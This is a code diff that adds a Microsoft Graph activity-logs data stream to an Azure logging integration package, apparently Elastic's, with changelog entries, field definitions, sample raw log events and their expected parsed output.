+https://management.azure.com/ + +# Azure USGovernmentCloud +https://management.usgovcloudapi.net/ +``` + +## Logs + +### graphactivitylogs + +The `graphactivitylogs` data stream of the Azure Logs package will collect Microsoft Graph activity events that have been streamed through an azure event hub. + +{{event "graphactivitylogs"}} + +{{fields "graphactivitylogs"}} diff --git a/packages/azure/changelog.yml b/packages/azure/changelog.yml index b7e611cb973..f10be2f4c0c 100644 --- a/packages/azure/changelog.yml +++ b/packages/azure/changelog.yml @@ -1,3 +1,28 @@ +- version: "1.11.0" + changes: + - description: Use ecs definition of the 'event.dataset' field for eventhub + type: enhancement + link: https://github.com/elastic/integrations/pull/9554 +- version: "1.10.0" + changes: + - description: Add Microsoft Graph Activity Logs + type: enhancement + link: https://github.com/elastic/integrations/pull/9314 +- version: "1.9.2" + changes: + - description: Add docs for running the integration behind a firewall. + type: enhancement + link: https://github.com/elastic/integrations/pull/9158 +- version: "1.9.1" + changes: + - description: Set field type to password on secret fields. + type: bugfix + link: https://github.com/elastic/integrations/pull/9159 +- version: "1.9.0" + changes: + - description: Add support for integration secrets + type: enhancement + link: https://github.com/elastic/integrations/pull/9022 - version: "1.8.3" changes: - description: Add caller_ip_address field in pipeline for Azure sign-in logs. diff --git a/packages/azure/data_stream/auditlogs/fields/fields.yml b/packages/azure/data_stream/auditlogs/fields/fields.yml index 9541945724e..c725d0c8197 100644 --- a/packages/azure/data_stream/auditlogs/fields/fields.yml +++ b/packages/azure/data_stream/auditlogs/fields/fields.yml @@ -152,6 +152,12 @@ - name: user_agent type: keyword description: User agent name. + - name: key + type: keyword + description: Additional details key + - name: value + type: keyword + description: Additional details value - name: authentication_protocol type: keyword description: Authentication protocol type. diff --git a/packages/azure/data_stream/eventhub/fields/base-fields.yml b/packages/azure/data_stream/eventhub/fields/base-fields.yml index 99d3c84233f..005699cf6bf 100644 --- a/packages/azure/data_stream/eventhub/fields/base-fields.yml +++ b/packages/azure/data_stream/eventhub/fields/base-fields.yml @@ -14,7 +14,3 @@ type: constant_keyword description: Event module value: azure -- name: event.dataset - type: constant_keyword - description: Event dataset - value: azure.eventhub diff --git a/packages/azure/data_stream/eventhub/fields/ecs.yml b/packages/azure/data_stream/eventhub/fields/ecs.yml index de00d49d7d7..08590c49910 100644 --- a/packages/azure/data_stream/eventhub/fields/ecs.yml +++ b/packages/azure/data_stream/eventhub/fields/ecs.yml @@ -44,6 +44,8 @@ external: ecs - name: event.type external: ecs +- external: ecs + name: event.dataset - name: file.mime_type external: ecs - name: file.size diff --git a/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-activitylogs-raw.log b/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-activitylogs-raw.log new file mode 100644 index 00000000000..bbd6318d87a --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-activitylogs-raw.log @@ -0,0 +1,5 @@ +{"Level":4,"callerIpAddress":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","category":"MicrosoftGraphActivityLogs","correlationId":"f7739da0-e6d1-4e3f-985a-64937fbge347","durationMs":462680,"location":"West Europe","operationName":"Microsoft Graph Activity","operationVersion":"v1.0","properties":{"apiVersion":"v1.0","appId":"a5a68e12-268a-3c91-a5e2-b9254e67hb29","atContent":"","clientAuthMethod":"2","clientRequestId":"2fe56789-a848-4c93-9d2c-5675972aejk9","durationMs":462680,"identityProvider":"https://sts.windows.net/a140785b-418d-4344-a4ec-8e9648919gdb/","ipAddress":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","location":"West Europe","operationId":"f7739da0-e6d1-4e3f-985a-64937fbge347","requestId":"f7739da0-e6d1-4e3f-985a-64937fbge347","requestMethod":"GET","requestUri":"https://graph.microsoft.com/v1.0/organization/a140785b-418d-4344-a4ec-8e9648919gdb?$select=Id,DisplayName,CreatedDateTime,ReplicationScope,Country,CountryLetterCode,DataBoundary","responseSizeBytes":364,"responseStatusCode":200,"roles":"Organization.Read.All User.Read.All","scopes":null,"servicePrincipalId":"f2aq4c71-31e3-5066-92g3-4b3dfbav50f0","signInActivityId":"sign-in_ActivityId","tenantId":"a140785b-418d-4344-a4ec-8e9648919gdb","timeGenerated":"2024-03-07T11:47:00.6442361Z","tokenIssuedAt":"2024-03-07T11:42:00Z","userAgent":"python-requests/2.27.1","userId":null,"wids":"1997b4d3-0g8d-90cb-bhj8-d89n3121e90"},"resourceId":"/TENANTS/A140785B-418D-4344-A4EC-8E9648919GDB/PROVIDERS/MICROSOFT.AADIAM","resultSignature":"200","tenantId":"a140785b-418d-4344-a4ec-8e9648919gdb","time":"2024-03-07T11:47:00.6442361Z"} +{"Level":4,"callerIpAddress":"81.2.69.143","category":"MicrosoftGraphActivityLogs","correlationId":"f7739jk0-e6d1-4e3f-985a-64937fbge367","durationMs":453011,"location":"Germany West Central","operationName":"Microsoft Graph Activity","operationVersion":"v1.0","properties":{"apiVersion":"v1.0","appId":"a5a68e12-268a-3c91-a5e2-b9254e67hb29","atContent":"","clientAuthMethod":"2","clientRequestId":"2fe56790-a848-4c83-9d2c-5675972aejk9","durationMs":453011,"identityProvider":"https://sts.windows.net/aa30985b-427d-4434-b4dc-8f9040719adb/","ipAddress":"81.2.69.143","location":"Germany West Central","operationId":"f7739jk0-e6d1-4e3f-985a-64937fbge367","requestId":"f7739jk0-e6d1-4e3f-985a-64937fbge367","requestMethod":"GET","requestUri":"https://graph.microsoft.com/v1.0/me/photos/96x96/$value","responseSizeBytes":294,"responseStatusCode":404,"roles":null,"scopes":"email openid Organization.Read.All Policy.ReadWrite.ApplicationConfiguration profile User.Read","servicePrincipalId":null,"signInActivityId":"sign-in_ActivityId","tenantId":"aa30985b-427d-4434-b4dc-8f9040719adb","timeGenerated":"2024-03-07T10:35:31.9597832Z","tokenIssuedAt":"2024-03-07T10:30:30Z","userAgent":"","userId":"b37ec517-0a34-4266-b627-f7bb0d679d70","wids":"1997b4d3-0g8d-90cb-bhj5-d80n3122e98 1997b4d3-0f8d-76cb-bhj5-d80n3122e98"},"resourceId":"/TENANTS/AA30985B-427D-4434-B4DC-8F9040719ADB/PROVIDERS/MICROSOFT.AADIAM","resultSignature":"404","tenantId":"aa30985b-427d-4434-b4dc-8f9040719adb","time":"2024-03-07T10:35:31.9597832Z"} +{"Level":4,"callerIpAddress":"81.2.69.144","category":"MicrosoftGraphActivityLogs","correlationId":"f7739da0-e6d1-4e3f-875a-64934fbge347","durationMs":16688471,"location":"UK South","operationName":"Microsoft Graph Activity","operationVersion":"beta","properties":{"apiVersion":"beta","appId":"a5a68e12-268a-3c91-a5f2-b9254e67hb28","atContent":"","clientAuthMethod":"0","clientRequestId":"2fe56789-a848-4c93-9s2c-5675972aghk9","durationMs":16688471,"identityProvider":null,"ipAddress":"81.2.69.144","location":"UK South","operationId":"f7739da0-e6d1-4e3f-875a-64934fbge347","requestId":"f7739da0-e6d1-4e3f-875a-64934fbge347","requestMethod":"GET","requestUri":"https://graph.microsoft.com/beta//users/7ef3c2ad-d52l-4a89-8cf9-c30178181027/photos/48x48/$value","responseSizeBytes":0,"responseStatusCode":404,"roles":null,"scopes":"AdministrativeUnit.ReadWrite.All AuditLog.Read.All Directory.AccessAsUser.All Directory.Write.Restricted email openid Organization.Read.All Policy.ReadWrite.Authorization profile User.EnableDisableAccount.All User.ReadWrite.All","servicePrincipalId":null,"signInActivityId":"signin_ActivityId","tenantId":"ab47545b-420e-46fg-c4dc-8f7697k1aadb","timeGenerated":"2024-03-07T16:42:22.84914Z","tokenIssuedAt":"2024-03-07T16:37:20Z","userAgent":"","userId":"285e0849-a706-4a9a-9eb1-f4e21cc78793","wids":"1997b4d3-0g8d-90cb-bhj5-d80n3122e98 1997b4d3-0g8d-90cb-bhj5-d80n3122e99 1997b4d3-0g8d-90cb-bhj5-d80n3122e80 1997b4d3-0g8d-90cb-bhj5-d80n3122e83"},"resourceId":"/TENANTS/AB47545B-420E-46FG-C4DC-8F7697K1AADB/PROVIDERS/MICROSOFT.AADIAM","resultSignature":"404","tenantId":"ab47545b-420e-46fg-c4dc-8f7697k1aadb","time":"2024-03-07T16:42:22.8491400Z"} +{"Level":4,"callerIpAddress":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","category":"MicrosoftGraphActivityLogs","correlationId":"f7749da0-e6g1-4f3f-975a-64937fbge347","durationMs":846544,"location":"UK South","operationName":"Microsoft Graph Activity","operationVersion":"beta","properties":{"apiVersion":"beta","appId":"a5a68e32-269a-3c91-a5e2-b9254e67hb29","atContent":"","clientAuthMethod":"0","clientRequestId":"2fe56789-a848-4c93-9d2d-5675972ardk9","durationMs":846544,"identityProvider":null,"ipAddress":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","location":"UK South","operationId":"f7749da0-e6g1-4f3f-975a-64937fbge347","requestId":"f7749da0-e6g1-4f3f-975a-64937fbge347","requestMethod":"GET","requestUri":"https://graph.microsoft.com/beta/devices?$select=displayName,id,deviceId\\u0026$search=%22displayName:a%22\\u0026$top=30","responseSizeBytes":0,"responseStatusCode":200,"roles":null,"scopes":"AccessReview.ReadWrite.All AuditLog.Read.All ChangeManagement.Read.All ConsentRequest.Create ConsentRequest.Read ConsentRequest.ReadApprove.All ConsentRequest.ReadWrite.All CustomSecAttributeAuditLogs.Read.All Directory.AccessAsUser.All Directory.Read.All Directory.ReadWrite.All Directory.Write.Restricted DirectoryRecommendations.Read.All DirectoryRecommendations.ReadWrite.All email EntitlementManagement.Read.All Group.ReadWrite.All IdentityProvider.ReadWrite.All IdentityRiskEvent.ReadWrite.All IdentityRiskyServicePrincipal.ReadWrite.All IdentityRiskyUser.ReadWrite.All IdentityUserFlow.Read.All LifecycleWorkflows.ReadWrite.All openid Policy.Read.All Policy.Read.IdentityProtection Policy.ReadWrite.AuthenticationFlows Policy.ReadWrite.AuthenticationMethod Policy.ReadWrite.ConditionalAccess Policy.ReadWrite.ExternalIdentities Policy.ReadWrite.IdentityProtection Policy.ReadWrite.MobilityManagement profile Reports.Read.All RoleManagement.ReadWrite.Directory RoleManagement.ReadWrite.Exchange SecurityEvents.ReadWrite.All TrustFrameworkKeySet.Read.All User.Export.All User.ReadWrite.All UserAuthenticationMethod.ReadWrite.All","servicePrincipalId":null,"signInActivityId":"signin_Activity-Id","tenantId":"ab47545b-420e-46fg-c4dc-8f7697k1aadb","timeGenerated":"2024-03-07T16:42:12.0485843Z","tokenIssuedAt":"2024-03-07T16:36:51Z","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0","userId":"285e0849-a706-4a9a-9eb1-f4e21cc78793","wids":"a207b4d3-0g8d-90cb-bhj5-d80n3122e67 a207b4d3-0g8d-90cb-bhj5-d80n3122e69 a207b4d3-0g8d-90cb-bhj5-d80n3122e89"},"resourceId":"/TENANTS/AB47545B-420E-46FG-C4DC-8F7697K1AADB/PROVIDERS/MICROSOFT.AADIAM","resultSignature":"200","tenantId":"ab47545b-420e-46fg-c4dc-8f7697k1aadb","time":"2024-03-07T16:42:12.0485843Z"} +{"Level":4,"callerIpAddress":"81.2.69.143","category":"MicrosoftGraphActivityLogs","correlationId":"f7839da0-e7d1-4e4f-985a-64937fbge347","durationMs":1100725,"location":"France Central","operationName":"Microsoft Graph Activity","operationVersion":"v1.0","properties":{"apiVersion":"v1.0","appId":"a5a68e32-269a-3c91-a5e2-b9254e67hb29","atContent":"","clientAuthMethod":"2","clientRequestId":"2fe58790-a848-4a93-9d2c-5645972aejk9","durationMs":1100725,"identityProvider":"https://sts.windows.net/ab30785b-417f-42a4-b5dc-8f9051718acb/","ipAddress":"81.2.69.143","location":"France Central","operationId":"f7839da0-e7d1-4e4f-985a-64937fbge347","requestId":"f7839da0-e7d1-4e4f-985a-64937fbge347","requestMethod":"GET","requestUri":"https://graph.microsoft.com/v1.0/directoryRoles","responseSizeBytes":4300,"responseStatusCode":200,"roles":"Application.Read.All Domain.Read.All GroupMember.Read.All LicenseAssignment.ReadWrite.All Organization.Read.All Policy.Read.ConditionalAccess RoleManagement.Read.Directory Team.ReadBasic.All TeamsTab.Create TeamsTab.Read.All TeamsTab.ReadWrite.All User.Read.All","scopes":null,"servicePrincipalId":"f2aq4c71-31e3-5065-91g3-4b2dfbsv50fg","signInActivityId":"sign-in_ActivityId","tenantId":"ab30785b-417f-42a4-b5dc-8f9051718acb","timeGenerated":"2024-03-07T10:24:44.7939418Z","tokenIssuedAt":"2024-03-07T10:19:44Z","userAgent":"","userId":null,"wids":"a207b4d3-0g8d-90cb-bhj5-d80n3121e69"},"resourceId":"/TENANTS/AB30785B-417F-42A4-B5DC-8F9051718ACB/PROVIDERS/MICROSOFT.AADIAM","resultSignature":"200","tenantId":"ab30785b-417f-42a4-b5dc-8f9051718acb","time":"2024-03-07T10:24:44.7939418Z"} \ No newline at end of file diff --git a/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json b/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json new file mode 100644 index 00000000000..ce88adad1e6 --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json @@ -0,0 +1,708 @@ +{ + "expected": [ + { + "@timestamp": "2024-03-07T11:47:00.644Z", + "azure": { + "correlation_id": "f7739da0-e6d1-4e3f-985a-64937fbge347", + "graphactivitylogs": { + "category": "MicrosoftGraphActivityLogs", + "operation_name": "Microsoft Graph Activity", + "operation_version": "v1.0", + "properties": { + "api_version": "v1.0", + "app_id": "a5a68e12-268a-3c91-a5e2-b9254e67hb29", + "client_auth_method": 2, + "client_request_id": "2fe56789-a848-4c93-9d2c-5675972aejk9", + "identity_provider": "https://sts.windows.net/a140785b-418d-4344-a4ec-8e9648919gdb/", + "operation_id": "f7739da0-e6d1-4e3f-985a-64937fbge347", + "roles": [ + "Organization.Read.All", + "User.Read.All" + ], + "service_principal_id": "f2aq4c71-31e3-5066-92g3-4b3dfbav50f0", + "sign_in_activity_id": "sign-in_ActivityId", + "time_generated": "2024-03-07T11:47:00.644Z", + "token_issued_at": "2024-03-07T11:42:00.000Z", + "wids": [ + "1997b4d3-0g8d-90cb-bhj8-d89n3121e90" + ] + }, + "result_signature": "200" + }, + "resource": { + "id": "/TENANTS/A140785B-418D-4344-A4EC-8E9648919GDB/PROVIDERS/MICROSOFT.AADIAM", + "provider": "MICROSOFT.AADIAM" + }, + "tenant_id": "a140785b-418d-4344-a4ec-8e9648919gdb" + }, + "client": { + "geo": { + "continent_name": "Europe", + "country_iso_code": "NO", + "country_name": "Norway", + "location": { + "lat": 62.0, + "lon": 10.0 + } + }, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + }, + "cloud": { + "account": { + "id": "a140785b-418d-4344-a4ec-8e9648919gdb" + }, + "provider": "azure", + "region": "West Europe", + "service": { + "name": "Microsoft Graph" + } + }, + "destination": { + "geo": { + "region_name": "West Europe" + } + }, + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Microsoft Graph Activity", + "duration": -1176467968, + "kind": "event", + "original": "{\"Level\":4,\"callerIpAddress\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"category\":\"MicrosoftGraphActivityLogs\",\"correlationId\":\"f7739da0-e6d1-4e3f-985a-64937fbge347\",\"durationMs\":462680,\"location\":\"West Europe\",\"operationName\":\"Microsoft Graph Activity\",\"operationVersion\":\"v1.0\",\"properties\":{\"apiVersion\":\"v1.0\",\"appId\":\"a5a68e12-268a-3c91-a5e2-b9254e67hb29\",\"atContent\":\"\",\"clientAuthMethod\":\"2\",\"clientRequestId\":\"2fe56789-a848-4c93-9d2c-5675972aejk9\",\"durationMs\":462680,\"identityProvider\":\"https://sts.windows.net/a140785b-418d-4344-a4ec-8e9648919gdb/\",\"ipAddress\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"location\":\"West Europe\",\"operationId\":\"f7739da0-e6d1-4e3f-985a-64937fbge347\",\"requestId\":\"f7739da0-e6d1-4e3f-985a-64937fbge347\",\"requestMethod\":\"GET\",\"requestUri\":\"https://graph.microsoft.com/v1.0/organization/a140785b-418d-4344-a4ec-8e9648919gdb?$select=Id,DisplayName,CreatedDateTime,ReplicationScope,Country,CountryLetterCode,DataBoundary\",\"responseSizeBytes\":364,\"responseStatusCode\":200,\"roles\":\"Organization.Read.All User.Read.All\",\"scopes\":null,\"servicePrincipalId\":\"f2aq4c71-31e3-5066-92g3-4b3dfbav50f0\",\"signInActivityId\":\"sign-in_ActivityId\",\"tenantId\":\"a140785b-418d-4344-a4ec-8e9648919gdb\",\"timeGenerated\":\"2024-03-07T11:47:00.6442361Z\",\"tokenIssuedAt\":\"2024-03-07T11:42:00Z\",\"userAgent\":\"python-requests/2.27.1\",\"userId\":null,\"wids\":\"1997b4d3-0g8d-90cb-bhj8-d89n3121e90\"},\"resourceId\":\"/TENANTS/A140785B-418D-4344-A4EC-8E9648919GDB/PROVIDERS/MICROSOFT.AADIAM\",\"resultSignature\":\"200\",\"tenantId\":\"a140785b-418d-4344-a4ec-8e9648919gdb\",\"time\":\"2024-03-07T11:47:00.6442361Z\"}", + "type": [ + "access" + ] + }, + "http": { + "request": { + "id": "f7739da0-e6d1-4e3f-985a-64937fbge347", + "method": "GET" + }, + "response": { + "bytes": 364, + "status_code": 200 + } + }, + "log": { + "level": "4" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + ] + }, + "source": { + "geo": { + "continent_name": "Europe", + "country_iso_code": "NO", + "country_name": "Norway", + "location": { + "lat": 62.0, + "lon": 10.0 + } + }, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "graph.microsoft.com", + "extension": "0/organization/a140785b-418d-4344-a4ec-8e9648919gdb", + "original": "https://graph.microsoft.com/v1.0/organization/a140785b-418d-4344-a4ec-8e9648919gdb?$select=Id,DisplayName,CreatedDateTime,ReplicationScope,Country,CountryLetterCode,DataBoundary", + "path": "/v1.0/organization/a140785b-418d-4344-a4ec-8e9648919gdb", + "query": "$select=Id,DisplayName,CreatedDateTime,ReplicationScope,Country,CountryLetterCode,DataBoundary", + "scheme": "https" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Python Requests", + "original": "python-requests/2.27.1", + "version": "2.27" + } + }, + { + "@timestamp": "2024-03-07T10:35:31.959Z", + "azure": { + "correlation_id": "f7739jk0-e6d1-4e3f-985a-64937fbge367", + "graphactivitylogs": { + "category": "MicrosoftGraphActivityLogs", + "operation_name": "Microsoft Graph Activity", + "operation_version": "v1.0", + "properties": { + "api_version": "v1.0", + "app_id": "a5a68e12-268a-3c91-a5e2-b9254e67hb29", + "client_auth_method": 2, + "client_request_id": "2fe56790-a848-4c83-9d2c-5675972aejk9", + "identity_provider": "https://sts.windows.net/aa30985b-427d-4434-b4dc-8f9040719adb/", + "operation_id": "f7739jk0-e6d1-4e3f-985a-64937fbge367", + "scopes": [ + "email", + "openid", + "Organization.Read.All", + "Policy.ReadWrite.ApplicationConfiguration", + "profile", + "User.Read" + ], + "sign_in_activity_id": "sign-in_ActivityId", + "time_generated": "2024-03-07T10:35:31.959Z", + "token_issued_at": "2024-03-07T10:30:30.000Z", + "wids": [ + "1997b4d3-0g8d-90cb-bhj5-d80n3122e98", + "1997b4d3-0f8d-76cb-bhj5-d80n3122e98" + ] + }, + "result_signature": "404" + }, + "resource": { + "id": "/TENANTS/AA30985B-427D-4434-B4DC-8F9040719ADB/PROVIDERS/MICROSOFT.AADIAM", + "provider": "MICROSOFT.AADIAM" + }, + "tenant_id": "aa30985b-427d-4434-b4dc-8f9040719adb" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143", + "user": { + "id": "b37ec517-0a34-4266-b627-f7bb0d679d70" + } + }, + "cloud": { + "account": { + "id": "aa30985b-427d-4434-b4dc-8f9040719adb" + }, + "provider": "azure", + "region": "Germany West Central", + "service": { + "name": "Microsoft Graph" + } + }, + "destination": { + "geo": { + "region_name": "Germany West Central" + } + }, + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Microsoft Graph Activity", + "duration": 2039433920, + "kind": "event", + "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.143\",\"category\":\"MicrosoftGraphActivityLogs\",\"correlationId\":\"f7739jk0-e6d1-4e3f-985a-64937fbge367\",\"durationMs\":453011,\"location\":\"Germany West Central\",\"operationName\":\"Microsoft Graph Activity\",\"operationVersion\":\"v1.0\",\"properties\":{\"apiVersion\":\"v1.0\",\"appId\":\"a5a68e12-268a-3c91-a5e2-b9254e67hb29\",\"atContent\":\"\",\"clientAuthMethod\":\"2\",\"clientRequestId\":\"2fe56790-a848-4c83-9d2c-5675972aejk9\",\"durationMs\":453011,\"identityProvider\":\"https://sts.windows.net/aa30985b-427d-4434-b4dc-8f9040719adb/\",\"ipAddress\":\"81.2.69.143\",\"location\":\"Germany West Central\",\"operationId\":\"f7739jk0-e6d1-4e3f-985a-64937fbge367\",\"requestId\":\"f7739jk0-e6d1-4e3f-985a-64937fbge367\",\"requestMethod\":\"GET\",\"requestUri\":\"https://graph.microsoft.com/v1.0/me/photos/96x96/$value\",\"responseSizeBytes\":294,\"responseStatusCode\":404,\"roles\":null,\"scopes\":\"email openid Organization.Read.All Policy.ReadWrite.ApplicationConfiguration profile User.Read\",\"servicePrincipalId\":null,\"signInActivityId\":\"sign-in_ActivityId\",\"tenantId\":\"aa30985b-427d-4434-b4dc-8f9040719adb\",\"timeGenerated\":\"2024-03-07T10:35:31.9597832Z\",\"tokenIssuedAt\":\"2024-03-07T10:30:30Z\",\"userAgent\":\"\",\"userId\":\"b37ec517-0a34-4266-b627-f7bb0d679d70\",\"wids\":\"1997b4d3-0g8d-90cb-bhj5-d80n3122e98 1997b4d3-0f8d-76cb-bhj5-d80n3122e98\"},\"resourceId\":\"/TENANTS/AA30985B-427D-4434-B4DC-8F9040719ADB/PROVIDERS/MICROSOFT.AADIAM\",\"resultSignature\":\"404\",\"tenantId\":\"aa30985b-427d-4434-b4dc-8f9040719adb\",\"time\":\"2024-03-07T10:35:31.9597832Z\"}", + "type": [ + "access" + ] + }, + "http": { + "request": { + "id": "f7739jk0-e6d1-4e3f-985a-64937fbge367", + "method": "GET" + }, + "response": { + "bytes": 294, + "status_code": 404 + } + }, + "log": { + "level": "4" + }, + "related": { + "ip": [ + "81.2.69.143" + ], + "user": [ + "b37ec517-0a34-4266-b627-f7bb0d679d70" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "graph.microsoft.com", + "extension": "0/me/photos/96x96/$value", + "original": "https://graph.microsoft.com/v1.0/me/photos/96x96/$value", + "path": "/v1.0/me/photos/96x96/$value", + "scheme": "https" + }, + "user": { + "id": "b37ec517-0a34-4266-b627-f7bb0d679d70" + } + }, + { + "@timestamp": "2024-03-07T16:42:22.849Z", + "azure": { + "correlation_id": "f7739da0-e6d1-4e3f-875a-64934fbge347", + "graphactivitylogs": { + "category": "MicrosoftGraphActivityLogs", + "operation_name": "Microsoft Graph Activity", + "operation_version": "beta", + "properties": { + "api_version": "beta", + "app_id": "a5a68e12-268a-3c91-a5f2-b9254e67hb28", + "client_auth_method": 0, + "client_request_id": "2fe56789-a848-4c93-9s2c-5675972aghk9", + "operation_id": "f7739da0-e6d1-4e3f-875a-64934fbge347", + "scopes": [ + "AdministrativeUnit.ReadWrite.All", + "AuditLog.Read.All", + "Directory.AccessAsUser.All", + "Directory.Write.Restricted", + "email", + "openid", + "Organization.Read.All", + "Policy.ReadWrite.Authorization", + "profile", + "User.EnableDisableAccount.All", + "User.ReadWrite.All" + ], + "sign_in_activity_id": "signin_ActivityId", + "time_generated": "2024-03-07T16:42:22.849Z", + "token_issued_at": "2024-03-07T16:37:20.000Z", + "wids": [ + "1997b4d3-0g8d-90cb-bhj5-d80n3122e98", + "1997b4d3-0g8d-90cb-bhj5-d80n3122e99", + "1997b4d3-0g8d-90cb-bhj5-d80n3122e80", + "1997b4d3-0g8d-90cb-bhj5-d80n3122e83" + ] + }, + "result_signature": "404" + }, + "resource": { + "id": "/TENANTS/AB47545B-420E-46FG-C4DC-8F7697K1AADB/PROVIDERS/MICROSOFT.AADIAM", + "provider": "MICROSOFT.AADIAM" + }, + "tenant_id": "ab47545b-420e-46fg-c4dc-8f7697k1aadb" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144", + "user": { + "id": "285e0849-a706-4a9a-9eb1-f4e21cc78793" + } + }, + "cloud": { + "account": { + "id": "ab47545b-420e-46fg-c4dc-8f7697k1aadb" + }, + "provider": "azure", + "region": "UK South", + "service": { + "name": "Microsoft Graph" + } + }, + "destination": { + "geo": { + "region_name": "UK South" + } + }, + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Microsoft Graph Activity", + "duration": -1771912256, + "kind": "event", + "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.144\",\"category\":\"MicrosoftGraphActivityLogs\",\"correlationId\":\"f7739da0-e6d1-4e3f-875a-64934fbge347\",\"durationMs\":16688471,\"location\":\"UK South\",\"operationName\":\"Microsoft Graph Activity\",\"operationVersion\":\"beta\",\"properties\":{\"apiVersion\":\"beta\",\"appId\":\"a5a68e12-268a-3c91-a5f2-b9254e67hb28\",\"atContent\":\"\",\"clientAuthMethod\":\"0\",\"clientRequestId\":\"2fe56789-a848-4c93-9s2c-5675972aghk9\",\"durationMs\":16688471,\"identityProvider\":null,\"ipAddress\":\"81.2.69.144\",\"location\":\"UK South\",\"operationId\":\"f7739da0-e6d1-4e3f-875a-64934fbge347\",\"requestId\":\"f7739da0-e6d1-4e3f-875a-64934fbge347\",\"requestMethod\":\"GET\",\"requestUri\":\"https://graph.microsoft.com/beta//users/7ef3c2ad-d52l-4a89-8cf9-c30178181027/photos/48x48/$value\",\"responseSizeBytes\":0,\"responseStatusCode\":404,\"roles\":null,\"scopes\":\"AdministrativeUnit.ReadWrite.All AuditLog.Read.All Directory.AccessAsUser.All Directory.Write.Restricted email openid Organization.Read.All Policy.ReadWrite.Authorization profile User.EnableDisableAccount.All User.ReadWrite.All\",\"servicePrincipalId\":null,\"signInActivityId\":\"signin_ActivityId\",\"tenantId\":\"ab47545b-420e-46fg-c4dc-8f7697k1aadb\",\"timeGenerated\":\"2024-03-07T16:42:22.84914Z\",\"tokenIssuedAt\":\"2024-03-07T16:37:20Z\",\"userAgent\":\"\",\"userId\":\"285e0849-a706-4a9a-9eb1-f4e21cc78793\",\"wids\":\"1997b4d3-0g8d-90cb-bhj5-d80n3122e98 1997b4d3-0g8d-90cb-bhj5-d80n3122e99 1997b4d3-0g8d-90cb-bhj5-d80n3122e80 1997b4d3-0g8d-90cb-bhj5-d80n3122e83\"},\"resourceId\":\"/TENANTS/AB47545B-420E-46FG-C4DC-8F7697K1AADB/PROVIDERS/MICROSOFT.AADIAM\",\"resultSignature\":\"404\",\"tenantId\":\"ab47545b-420e-46fg-c4dc-8f7697k1aadb\",\"time\":\"2024-03-07T16:42:22.8491400Z\"}", + "type": [ + "access" + ] + }, + "http": { + "request": { + "id": "f7739da0-e6d1-4e3f-875a-64934fbge347", + "method": "GET" + }, + "response": { + "bytes": 0, + "status_code": 404 + } + }, + "log": { + "level": "4" + }, + "related": { + "ip": [ + "81.2.69.144" + ], + "user": [ + "285e0849-a706-4a9a-9eb1-f4e21cc78793" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "graph.microsoft.com", + "original": "https://graph.microsoft.com/beta//users/7ef3c2ad-d52l-4a89-8cf9-c30178181027/photos/48x48/$value", + "path": "/beta//users/7ef3c2ad-d52l-4a89-8cf9-c30178181027/photos/48x48/$value", + "scheme": "https" + }, + "user": { + "id": "285e0849-a706-4a9a-9eb1-f4e21cc78793" + } + }, + { + "@timestamp": "2024-03-07T16:42:12.048Z", + "azure": { + "correlation_id": "f7749da0-e6g1-4f3f-975a-64937fbge347", + "graphactivitylogs": { + "category": "MicrosoftGraphActivityLogs", + "operation_name": "Microsoft Graph Activity", + "operation_version": "beta", + "properties": { + "api_version": "beta", + "app_id": "a5a68e32-269a-3c91-a5e2-b9254e67hb29", + "client_auth_method": 0, + "client_request_id": "2fe56789-a848-4c93-9d2d-5675972ardk9", + "operation_id": "f7749da0-e6g1-4f3f-975a-64937fbge347", + "scopes": [ + "AccessReview.ReadWrite.All", + "AuditLog.Read.All", + "ChangeManagement.Read.All", + "ConsentRequest.Create", + "ConsentRequest.Read", + "ConsentRequest.ReadApprove.All", + 